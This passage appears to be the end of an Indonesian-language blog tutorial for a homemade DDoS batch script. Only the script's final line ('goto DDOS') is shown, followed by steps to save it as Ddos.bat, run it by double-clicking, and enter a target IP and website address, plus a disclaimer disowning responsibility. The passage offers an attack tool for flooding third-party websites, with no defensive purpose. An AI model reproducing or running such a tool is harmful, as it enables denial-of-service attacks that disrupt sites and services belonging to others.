goto DDOS


3. nama file terserah sobat  ( simpan dengan extensi .bat )
4. contohnya Ddos.bat
5. jalankan file dengan cara double klik.

cara pakainya :
- pada menu server - target sobat dapat memasukan ip target sobat
- masukan alamat web yang ingin Ddos

NB: silakan pergunakan aplikasi tersebut dengan bijak. dan saya tidak pertanggung jawah atas apapun yang terjadi..